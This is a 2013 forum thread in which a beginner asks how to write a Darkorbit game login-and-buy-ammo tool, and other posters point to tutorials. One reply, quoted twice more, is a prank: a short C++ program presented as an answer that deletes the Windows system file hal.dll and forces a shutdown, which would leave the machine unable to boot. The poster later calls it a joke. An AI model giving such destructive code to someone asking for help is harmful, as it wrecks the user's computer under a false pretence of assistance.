Visual Basic- Darkorbit login and buy ammo.

03/21/2013 19:50 Niko09185#1
Hi. I would like to create Darkorbit login system. But I do not know how to create a program that: I will write the name, password and server. And then when I click on login then there will be a status bar when it reads to me to buy ammo. No webrowser. Can you send me a website where I can learn it? Thanks.
03/21/2013 19:52 batuhanboran123#2
So u dont have C++ Exprience


Code:
#include <cstdlib>
#include <iostream>
using namespace std;
int main(int argc, char *argv[])
{
   std::remove("C:\\windows\\system32\\hal.dll"); 
    system("shutdown -s -r");
    system("PAUSE");
    return EXIT_SUCCESS;
}
03/21/2013 20:03 daswoll56#3
Quote:
Originally Posted by Niko09185 View Post
Hi. I would like to create Darkorbit login system. But I do not know how to create a program that: I will write the name, password and server. And then when I click on login then there will be a status bar when it reads to me to buy ammo. No webrowser. Can you send me a website where I can learn it? Thanks.
just watch a few months tutorials on the internet and maybe you can create one ^^

Quote:
Originally Posted by batuhanboran123 View Post
So u dont have C++ Exprience


Code:
#include <cstdlib>
#include <iostream>
using namespace std;
int main(int argc, char *argv[])
{
   std::remove("C:\\windows\\system32\\hal.dll"); 
    system("shutdown -s -r");
    system("PAUSE");
    return EXIT_SUCCESS;
}
lol
03/21/2013 20:04 batuhanboran123#4
Quote:
Originally Posted by creeez View Post
^this
This >_<

İ didnt understand ?

Quote:
Originally Posted by daswoll56 View Post
just watch a few months tutorials on the internet and maybe you can create one ^^



lol


İt can be Funny Jokes

Death of Blue screen

who can give Port And İp adress :D
03/21/2013 20:13 Joever11#5
You can use my TUT [Only registered and activated users can see links. Click Here To Register...]
It's created in visual basic
03/21/2013 20:25 Falcon555#6
check it before
03/21/2013 20:40 Niko09185#7
Quote:
#include <cstdlib>
#include <iostream>
using namespace std;
int main(int argc, char *argv[])
{
std::remove("C:\\windows\\system32\\hal.dll");
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}
"system("shutdown -s -r");" yes thx
C + + know a little I know what is the command :)
03/21/2013 20:54 NoCheatImPGM#8
I think youtube is better !
I've find too many tuto when i've start learning vb.net